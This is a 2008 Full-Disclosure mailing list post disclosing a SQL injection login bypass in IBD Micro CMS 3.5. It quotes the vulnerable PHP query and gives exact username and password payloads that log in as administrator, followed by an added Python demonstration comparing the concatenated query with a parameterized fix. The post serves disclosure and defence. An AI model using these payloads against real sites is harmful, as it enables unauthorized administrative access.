Hey guys, I came across a SQL Injection bug in IBD Micro CMS in version 3.5 and maybe lower...

News about it:
http://wired-security.net/archive/2008/may/index.php#12052008

Advisory to read:
http://wired-security.net/texts/advisories/IBD_Micro_CMS_3.5_SQL_Injection_Login_Bypass_Advisory.txt

--- In Short: ---

--- SNIP ---
if ($i == 0) {
    $sql = ' SELECT * FROM microcms_administrators WHERE administrators_username = "' . $_POST['administrators_username'] . '" and administrators_pass = PASSWORD("' . $_POST['administrators_pass'] . '")';
    $user_result = mysql_query($sql);
--- SNIP ---

Username: " or "1" = "1
Password: ") or "1" = "1" or PASSWORD("

Will result in:

--- SNIP ---
$sql = ' SELECT * FROM microcms_administrators WHERE administrators_username = "" or "1" = "1" and administrators_pass = PASSWORD("") or "1" = "1" or PASSWORD("")';
--- SNIP ---

-> Logged in as administrator!

Greets,
SkyOut/Wired Security

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
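
Added example, not part of the original post and not IBD Micro CMS code: the login query quoted above built by concatenation, next to a parameterized version of the same query, run against the same inputs. Assumptions: an in-memory SQLite database stands in for MySQL, fake_password() is a hypothetical stand-in for MySQL's PASSWORD(), and the admin row is constructed sample data.

```python
import hashlib
import sqlite3

# Inputs exactly as given in the advisory text above.
ADVISORY_USER = '" or "1" = "1'
ADVISORY_PASS = '") or "1" = "1" or PASSWORD("'


def fake_password(value):
    # Hypothetical stand-in for MySQL's PASSWORD(); it only has to be deterministic.
    return hashlib.sha1(value.encode()).hexdigest()


def make_db():
    conn = sqlite3.connect(":memory:")
    # The quoted query uses double-quoted string literals (MySQL's default mode).
    # SQLite accepts them by default; enable that explicitly where Python allows it.
    op = getattr(sqlite3, "SQLITE_DBCONFIG_DQS_DML", None)
    if op is not None and hasattr(conn, "setconfig"):
        conn.setconfig(op, True)
    conn.create_function("PASSWORD", 1, fake_password)
    conn.execute(
        "CREATE TABLE microcms_administrators "
        "(administrators_username TEXT, administrators_pass TEXT)"
    )
    # Constructed sample account.
    conn.execute(
        "INSERT INTO microcms_administrators VALUES (?, ?)",
        ("admin", fake_password("constructed-secret")),
    )
    return conn


def login_concatenated(conn, username, password):
    # Same string building as the quoted PHP: the input becomes part of the SQL
    # text, so a quote in it ends the literal and the rest is parsed as SQL.
    sql = ('SELECT * FROM microcms_administrators WHERE administrators_username = "'
           + username + '" and administrators_pass = PASSWORD("' + password + '")')
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    # Placeholders keep the input as data; the WHERE clause cannot be rewritten.
    sql = ("SELECT * FROM microcms_administrators "
           "WHERE administrators_username = ? AND administrators_pass = PASSWORD(?)")
    return conn.execute(sql, (username, password)).fetchall()
```

With the advisory's inputs the concatenated query returns the admin row because the injected `or "1" = "1"` terms sit outside the `and`, while the parameterized query returns nothing. In PHP the same binding is available through mysqli or PDO prepared statements.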
